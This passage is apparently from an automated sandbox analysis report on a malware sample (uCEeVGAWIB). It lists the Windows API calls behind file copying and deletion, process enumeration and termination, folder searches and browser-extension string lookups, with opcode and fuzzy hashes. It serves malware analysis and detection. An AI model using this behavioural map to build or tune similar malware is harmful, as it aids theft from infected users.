                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D6E8
                                                • lstrlen.KERNEL32(00000000), ref: 0081D8FF
                                                • lstrlen.KERNEL32(00000000), ref: 0081D913
                                                • DeleteFileA.KERNEL32(00000000), ref: 0081D992
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                • String ID:
                                                • API String ID: 211194620-0
                                                • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                • Instruction ID: 704e107a1f82bcd8b9fb2e547d6a3a13f202c6f842a02398fe7b88ae97a9b6fb
                                                • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                • Instruction Fuzzy Hash: 4D91DF71910128DBCB0CEBA8ED96DEE7339FF14700F504569F516E2091EE346A88CB63
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                • String ID:
                                                • API String ID: 211194620-0
                                                • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081DA68
                                                • lstrlen.KERNEL32(00000000), ref: 0081DC06
                                                • lstrlen.KERNEL32(00000000), ref: 0081DC1A
                                                • DeleteFileA.KERNEL32(00000000), ref: 0081DC99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                • String ID:
                                                • API String ID: 211194620-0
                                                • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                • Instruction ID: dea75ded918a7ce0bdbf33379e3399b2e82ead97bdc8b1a117c031ed8bef0480
                                                • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                • Instruction Fuzzy Hash: 8E81CD75910228DBCF08EBA8ED96DEE7339FF54700F504569F106E6491EE346A88CB63
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                • String ID:
                                                • API String ID: 211194620-0
                                                • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                • API String ID: 998311485-3310892237
                                                • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                APIs
                                                • memset.MSVCRT ref: 00829752
                                                  • Part of subcall function 00828FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00829785,00000000), ref: 00828FC2
                                                  • Part of subcall function 00828FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00828FC9
                                                  • Part of subcall function 00828FB7: wsprintfW.USER32 ref: 00828FDF
                                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00829812
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00829830
                                                • CloseHandle.KERNEL32(00000000), ref: 0082983D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                • String ID:
                                                • API String ID: 3729781310-0
                                                • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                • Instruction ID: 78af1b154ce8101633b1e4d56c919b12282492ec1c5ab5ccd4ca82fb636fe6c9
                                                • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                • Instruction Fuzzy Hash: F53146B5E00258EFDB14DFE4DC49BEDB7B9FF49700F104428E506AA284DB74AA84CB52
                                                APIs
                                                • memset.MSVCRT ref: 004194EB
                                                  • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                  • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                  • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                • String ID:
                                                • API String ID: 396451647-0
                                                • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00828931
                                                • Process32First.KERNEL32(?,00000128), ref: 00828945
                                                • Process32Next.KERNEL32(?,00000128), ref: 0082895A
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • CloseHandle.KERNEL32(?), ref: 008289C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                • String ID:
                                                • API String ID: 1066202413-0
                                                • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                • Instruction ID: a61c3a9c047c0264a8af3151be329fca8ccb95e68ba6ea3325b1a526cedde641
                                                • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                • Instruction Fuzzy Hash: 0D313C71941228EBCB28DF94ED41FEEB7B8FF45700F104199A50AE21A0DB346E84CF92
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • CloseHandle.KERNEL32(?), ref: 00418761
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                • String ID:
                                                • API String ID: 1066202413-0
                                                • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                APIs
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                • lstrcatA.KERNEL32(?,00899990), ref: 00414FAB
                                                • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                  • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                • String ID:
                                                • API String ID: 2667927680-0
                                                • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcessstrtok_s
                                                • String ID:
                                                • API String ID: 3407564107-0
                                                • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                • Instruction ID: 854064397952fbefda61d6f10173cf94fa9c0ec018329ed5731c7eb33012bca5
                                                • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                • Instruction Fuzzy Hash: 201116B8901219EFCF04DFE4E948AEDBBB9FF14705F108469E906A6250E7706B84CF56
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00827C17
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00827C1E
                                                • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00827C2B
                                                • wsprintfA.USER32 ref: 00827C5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                • String ID:
                                                • API String ID: 377395780-0
                                                • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                • Instruction ID: 82e580cb4543558d6a50017fa7a0529536173f2bf3f45b6bc54b75c0e3b605c2
                                                • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                • Instruction Fuzzy Hash: FA1139B2944118ABCB14DFDADD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                • wsprintfA.USER32 ref: 004179F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                • String ID:
                                                • API String ID: 1243822799-0
                                                • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00827CCA
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00827CD1
                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00827CE4
                                                • wsprintfA.USER32 ref: 00827D1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                • String ID:
                                                • API String ID: 3317088062-0
                                                • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                • Instruction ID: ed80603848179ccb66d2d78340040875a80682154d93aaebc3779225c636e9ef
                                                • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                • Instruction Fuzzy Hash: 2F115EB1A45228EFEB208B55DC49FA9B7B8FB05721F10439AE51AE32C0C77459808F51
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strtok_s
                                                • String ID:
                                                • API String ID: 3330995566-0
                                                • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                • Instruction ID: 7a6ce9c3f0f852548f1c1caaddfe975579dba9e8cc93b1967f950e9080c80a99
                                                • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                • Instruction Fuzzy Hash: 181106B4E00219EFDB14CFE6E958BEEBBB9FB05705F10C029E025AA250D7B89641CF55
                                                APIs
                                                • CreateFileA.KERNEL32(00823D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00823D55,?), ref: 00829563
                                                • GetFileSizeEx.KERNEL32(000000FF,00823D55), ref: 00829580
                                                • CloseHandle.KERNEL32(000000FF), ref: 0082958E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleSize
                                                • String ID:
                                                • API String ID: 1378416451-0
                                                • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                • Instruction ID: ec5d47f75d3ba5d3560c0bee80d3712a88b9a34465f2ecb21756eb39636dc6aa
                                                • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                • Instruction Fuzzy Hash: 8DF01939F40208BBDB20DFA0EC49B9A77BAEB49720F108654FA51A7280D63596418B40
                                                APIs
                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D31
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D4F
                                                • CloseHandle.KERNEL32(00000000), ref: 00826D60
                                                • Sleep.KERNEL32(00001770), ref: 00826D6B
                                                • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D81
                                                • ExitProcess.KERNEL32 ref: 00826D89
